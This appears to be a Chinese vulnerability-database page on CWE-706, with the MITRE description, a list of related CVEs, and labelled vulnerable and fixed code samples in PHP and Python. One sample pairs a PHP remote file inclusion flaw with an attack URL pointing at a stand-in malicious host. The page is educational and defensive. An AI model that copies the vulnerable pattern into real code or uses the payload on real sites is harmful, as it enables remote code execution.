目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1336

100%

CWE-706 使用不正确的解析名称或索引 类漏洞列表 67

CWE-706 使用不正确的解析名称或索引 类弱点 67 条 CVE 漏洞汇总,含 AI 中文分析。

CWE-706属于引用解析错误漏洞,指程序使用的名称或引用未能正确解析到预期资源,导致访问了控制范围外的对象。攻击者通常通过操纵输入或环境变量,诱导系统引用恶意资源以执行未授权操作或窃取数据。开发者应严格验证输入,使用白名单机制限制可访问的资源范围,并确保引用解析过程在受控环境中进行,从而防止意外指向外部资源。

MITRE CWE 官方描述
CWE:CWE-706 使用不正确解析的名称或引用 (Use of Incorrectly-Resolved Name or Reference) 英文:产品使用名称或引用来访问资源,但该名称/引用解析到的资源超出了预期的控制范围 (intended control sphere)。
常见影响 (1)
Confidentiality, Integrity Read Application Data, Modify Application Data
代码示例 (2)
The following code, victim.php, attempts to include a function contained in a separate PHP page on the server. It builds the path to the file by using the supplied 'module_name' parameter and appending the string '/function.php' to it.
$dir = $_GET['module_name']; include($dir . "/function.php");
Bad · PHP
victim.php?module_name=http://malicious.example.com
Attack
This script intends to read a user-supplied file from the current directory. The user inputs the relative path to the file and the script uses Python's os.path.join() function to combine the path to the current working directory with the provided path to the specified file. This results in an absolute path to the desired file. If the file does not exist when the script attempts to read it, an erro…
import os import sys def main(): filename = sys.argv[1] path = os.path.join(os.getcwd(), filename) try: with open(path, 'r') as f: file_data = f.read() except FileNotFoundError as e: print("Error - file not found") main()
Bad · Python
import os import sys def main(): filename = sys.argv[1] path = os.path.normpath(f"{os.getcwd()}{os.sep}{filename}") if path.startswith("/home/cwe/documents/"): try: with open(path, 'r') as f: file_data = f.read() except FileNotFoundError as e: print("Error - file not found") main()
Good · Python
CVE ID 标题 CVSS 风险等级 Published
CVE-2026-93375 Chrome 153.0.8010.52 之前沙箱逃逸漏洞 — Chrome - - 2026-09-17
CVE-2026-92951 VM2 3.11.7 之前 模块白名单绕过漏洞 — vm2 9.9 Critical 2026-09-17
CVE-2026-91727 Google Chrome 输入验证错误漏洞 — Chrome - - 2026-09-15
CVE-2026-87618 Google Chrome 输入验证错误漏洞 — Chrome - - 2026-09-09
CVE-2026-87562 Google Chrome 输入验证错误漏洞 — Chrome - - 2026-09-09
CVE-2026-87613 Google Chrome 输入验证错误漏洞 — Chrome - - 2026-09-09
CVE-2026-87547 Google Chrome 输入验证错误漏洞 — Chrome - - 2026-09-09
CVE-2026-81383 Microsoft Visual Studio Code 输入验证错误漏洞 — Visual Studio Code 7.4 High 2026-09-08
CVE-2026-79254 Google Chrome 输入验证错误漏洞 — Chrome - - 2026-08-25
CVE-2026-79273 Google Chrome 输入验证错误漏洞 — Chrome - - 2026-08-25
CVE-2026-79103 Google Chrome 输入验证错误漏洞 — Chrome - - 2026-08-25
CVE-2026-79070 Google Chrome 输入验证错误漏洞 — Chrome - - 2026-08-25
CVE-2026-79049 Google Chrome 输入验证错误漏洞 — Chrome - - 2026-08-25
CVE-2026-79264 Google Chrome 输入验证错误漏洞 — Chrome - - 2026-08-25
CVE-2026-78942 Google Chrome 输入验证错误漏洞 — Chrome - - 2026-08-25
CVE-2026-78985 Google Chrome 输入验证错误漏洞 — Chrome - - 2026-08-25
CVE-2026-67602 phpIPAM 输入验证错误漏洞 — phpipam 9.1 Critical 2026-08-24
CVE-2026-65816 Microsoft azure web apps 输入验证错误漏洞 — Azure Web Apps 10.0 Critical 2026-08-20
CVE-2026-13097 FreeIPA 输入验证错误漏洞 — Red Hat Enterprise Linux 10 8.7 High 2026-08-20
CVE-2026-76039 Google Chrome 输入验证错误漏洞 — Chrome - - 2026-08-18
CVE-2026-29036 Dave Gamble cJSON 输入验证错误漏洞 — cJSON 7.5 High 2026-08-11
CVE-2026-16120 nextlevelbuilder goclaw 输入验证错误漏洞 — GoClaw 6.3 Medium 2026-07-18
CVE-2026-62190 OpenClaw 输入验证错误漏洞 — OpenClaw 8.8 High 2026-07-13
CVE-2026-57054 Juniper Networks Junos OS 输入验证错误漏洞 — Junos OS 5.8 Medium 2026-07-09
CVE-2025-12506 GitLab 输入验证错误漏洞 — GitLab 3.5 Low 2026-07-08
CVE-2026-13372 Devolutions Remote Desktop Manager 输入验证错误漏洞 — Remote Desktop Manager - - 2026-06-26
CVE-2026-54022 Open WebUI 输入验证错误漏洞 — open-webui 5.3 Medium 2026-06-23
CVE-2026-54282 Kludex Starlette 输入验证错误漏洞 — starlette 3.7 Low 2026-06-22
CVE-2026-10696 Devolutions UniGetUI 输入验证错误漏洞 — UniGetUI - - 2026-06-17
CVE-2026-45306 pyLoad 安全漏洞 — pyload 6.5 Medium 2026-05-28

CWE-706(使用不正确的解析名称或索引) 是常见的弱点类别,本平台收录该类弱点关联的 67 条 CVE 漏洞。